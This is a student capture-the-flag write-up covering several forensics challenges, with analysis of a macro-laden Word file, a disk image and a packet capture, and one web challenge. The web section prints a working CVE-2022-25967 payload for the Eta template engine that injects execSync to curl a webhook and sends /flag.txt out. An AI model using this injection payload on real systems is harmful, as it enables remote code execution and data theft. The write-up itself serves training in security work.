CSLU 2024 UPM

Forensics

Dr. Mals

---

1. Download the Dr. Mals word file
2. Use Oletools - olevba to decrypt this file
   • 
3. With the use of CyberChef, we can find out the encoded text
   • 
4. Searching the website and it given
   • 
5. Lets decode this
   • With the use of online decoderwe can find out the flag
   • 
6. Thats it.

Acknowledgement

Thx to Akram for providing Hint

RE:Memory Delete

---

1. First, we download the attached file given by the challenge.
   • Challenge.7z
2. Unzip it.
   -Challenge.ad1 files inside.
3. .ad1 is a image files so lets use FTK Imager to find the deleted file
4. 
5. There goes the flag

Skyfall

---

Pain killer, My Skill issue… XD

1. Download the file attach by the challenge.
   -capture.pcapng
2. Use wireshark to open the pcapng files
3. See the clue given, Love the EDITED LEWIS VERSION files and lost the flag.
   • 
4. File -> Export -> Http, and save all the files.
5. we can see there is 5 files exported, 2 text file with word File received successfully! and file_data=16ae9187d13259788a97aef16a7d50f8b6376fbcba92a0f53e7e68d9f562a3a6576a3183a8dc8631c64fbd9147c8b608
   • usefull for later
6. And there is a file with big data 24,345kb and let us see what file is that.

• 

7. Looks like it is a elf file
   
8. I manage to find a website to extract the elf file EzyZIP
9. We can see the largest file is here after extract

• 
  After have a long time searching, i cant found any ways to extract pydata… skill issue XD

10. After the end of the day, my friend told me there is something call Pyinstxtractor that can extract it.
    • 
    • This is what i found
11. okayyyy here is it
    • 
12. Theres alot files inside, but the one the name skyfall-lewis-edited-version.pyc is the most suspicious.
    • 
13. With the use of this website Pylingual, i transfer pyc files to py
    • 
14. We can see it is a AES encyption function and the key is the time which the user encrypt when downloaded, so lets go back to wireshark and find the date when she successfuly download.
    • 
    • We can find out that the epoch for the time she download the file is 1733988750
15. Then use GPT xd find the key out
    • 
    • ps: I also dk why need to use 1733988749 just told by my friend to use it cant find any things that support this epoch XD.
16. Okay, then let us go to decrypt it. Use cyberchef
17. 
    Heres the flag.
    Okay its maybe abit harder than i though. cry die.

Acknowledgement

Thx to Bakayang for providing solution at the end of the day

WEB

Useless Website

---

1. Download the source code of the website

2. We can see theres something in the package.json file

   • 

3. Searching on the internet CVE-2022-25967 showing that there is some leakage can be use on the eta framework.

4. In burpsuite, intercept the web and change to this

   /utils/settings HTTP/1.1

   Host: 5.75.155.50:1341
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate, br
   Connection: keep-alive
   Content-Type: application/json
   Upgrade-Insecure-Requests: 1
   If-None-Match: W/"1057-ih1IUXlwncna8aHynJLYIHjiX30"
   Priority: u=0, i
   Content-Length: 292
   
   {
     "settings": {
       "view options": {
         "varName": "x=process.mainModule.require('child_process').execSync('curl https://webhook.site/self id/$(cat /flag.txt)')",
         "include": false,
         "includeFile": false,
         "useWith": true
       }
     }
   }

5. And we can find out the flag at the end of the webhook link.

   • 
   • CSLU{wh4ts_y0ur_et4?}

Acknowledgement

Thx for Megat for the solution.